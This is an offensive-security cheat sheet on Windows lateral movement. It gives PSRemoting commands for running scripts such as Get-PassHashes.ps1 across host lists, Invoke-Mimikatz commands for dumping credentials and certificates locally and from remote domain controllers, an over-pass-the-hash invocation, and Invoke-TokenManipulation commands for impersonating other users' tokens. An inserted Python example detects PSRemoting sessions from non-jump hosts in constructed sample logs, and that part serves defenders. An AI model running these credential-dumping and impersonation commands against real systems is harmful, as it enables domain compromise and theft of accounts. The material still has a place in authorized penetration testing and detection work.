# lateral\_movement

## Lateral Movement: PSRemoting

PSRemoting is enabled by default on Server 2012 onwards. Enable it if it is not already:

```powershell
Enable-PSRemoting
```

You get an elevated shell on the remote system if admin credentials are used to authenticate (which is the default setting).

Connecting via PSRemoting uses one of these cmdlets:

```powershell
New-PSSession
Enter-PSSession
Invoke-Command
```

Use the following to execute commands or semicolon-separated scripts:

```powershell
# <computer_list.txt> is a placeholder: a file with one hostname per line
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <computer_list.txt>)
```

Use the following to execute scripts from files:

```powershell
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <computer_list.txt>)
```
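From the defender's side, every remote session opened with the cmdlets above leaves a pair of events on the target: a Security 4624 network logon (LogonType 3) for the caller's account, followed by Microsoft-Windows-WinRM/Operational event 91 ("Creating WSMan shell on server"). The script below is an added example, not part of the original notes, that correlates those two events over constructed sample log lines and alerts when the session comes from a host that is not an approved admin jump box. The key=value line format, the field names, the jump-host allow-list and the 60-second correlation window are all assumptions made for the example.

```python
"""Detection example: PowerShell Remoting (WinRM) sessions from hosts that
are not approved admin jump boxes.

Added illustrative code (not from the original notes). The log lines are
constructed key=value renderings of two real Windows event sources:
  - Security event 4624, LogonType=3 (network logon) on the target
  - Microsoft-Windows-WinRM/Operational event 91 (WSMan shell created)
Field names, the allow-list and the time window are assumptions.
"""
from datetime import datetime, timedelta

# Constructed sample log lines (not real telemetry).
SAMPLE_LOGS = """\
ts=2024-03-01T09:00:01 host=dc01 source=Security event=4624 logon_type=3 user=CORP\\admin.jane src_ip=10.0.0.5
ts=2024-03-01T09:00:02 host=dc01 source=WinRM event=91 user=CORP\\admin.jane src_ip=10.0.0.5
ts=2024-03-01T11:42:10 host=dc01 source=Security event=4624 logon_type=3 user=CORP\\svc_backup src_ip=10.0.3.77
ts=2024-03-01T11:42:11 host=dc01 source=WinRM event=91 user=CORP\\svc_backup src_ip=10.0.3.77
ts=2024-03-01T11:50:00 host=dc02 source=Security event=4624 logon_type=3 user=CORP\\fileshare src_ip=10.0.3.77
ts=2024-03-01T11:50:05 host=dc02 source=Security event=4624 logon_type=10 user=CORP\\admin.jane src_ip=10.0.0.5
"""

# Assumed allow-list: hosts from which PSRemoting is expected.
JUMP_HOSTS = {"10.0.0.5"}
# Assumed: a WinRM shell should follow its network logon within this window.
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Turn one key=value log line into a dict; ts becomes a datetime."""
    rec = dict(tok.split("=", 1) for tok in line.split())
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def find_unexpected_psremoting(log_text, jump_hosts=JUMP_HOSTS, window=WINDOW):
    """Return (host, user, src_ip) for each WinRM shell creation (event 91)
    that pairs with a 4624 type-3 logon from the same user and source on the
    same host within the window, where src_ip is not an approved jump host.
    """
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    network_logons = [
        r for r in records
        if r["source"] == "Security" and r["event"] == "4624"
        and r.get("logon_type") == "3"
    ]
    alerts = []
    for r in records:
        if not (r["source"] == "WinRM" and r["event"] == "91"):
            continue
        if r["src_ip"] in jump_hosts:
            continue
        # Require the matching network logon shortly before the shell was created.
        matched = any(
            l["host"] == r["host"] and l["user"] == r["user"]
            and l["src_ip"] == r["src_ip"]
            and timedelta(0) <= r["ts"] - l["ts"] <= window
            for l in network_logons
        )
        if matched:
            alerts.append((r["host"], r["user"], r["src_ip"]))
    return alerts


if __name__ == "__main__":
    for host, user, src in find_unexpected_psremoting(SAMPLE_LOGS):
        print(f"ALERT: PSRemoting shell on {host} by {user} from {src}")
```

Only the svc_backup session on dc01 is flagged: the admin.jane session comes from the allow-listed jump host, the dc02 logon from 10.0.3.77 has no WinRM shell to pair with, and logon type 10 (RemoteInteractive, i.e. RDP) is not PSRemoting at all. Pairing on the 4624 event rather than alerting on event 91 alone also gives the analyst the authenticating account and source address in one record.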

## Mimikatz

Invoke-Mimikatz uses the PowerShell remoting cmdlet Invoke-Command to do the following. Thus, credentials or administrative access to the remote computers is required.

When using Mimikatz, if you receive errors like "ERROR kuhl\_m\_sekurlsa\_acquireLSA", try running the following command first:

```powershell
Invoke-Mimikatz -Command '"privilege::debug"'
```

Dump credentials on multiple remote machines:

```powershell
Invoke-Mimikatz -DumpCreds -ComputerName @("dc01", "dc02")
```

Dump credentials on the local machine:

```powershell
Invoke-Mimikatz -DumpCreds
```

Dump certificates on the local machine:

```powershell
Invoke-Mimikatz -DumpCerts
```


Over-pass-the-hash: generate tokens from hashes.

```powershell
# <NTLM_hash> is a placeholder for the account's NTLM hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:. /ntlm:<NTLM_hash> /run:powershell.exe"'
```

List all the tokens on a machine:

```powershell
Invoke-TokenManipulation -ShowAll
```

List all unique, usable tokens on the machine:

```powershell
Invoke-TokenManipulation -Enumerate
```

Start a new process with the token of a specific user:

```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
```

Start a new process with the token of another process:

```powershell
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 550
```
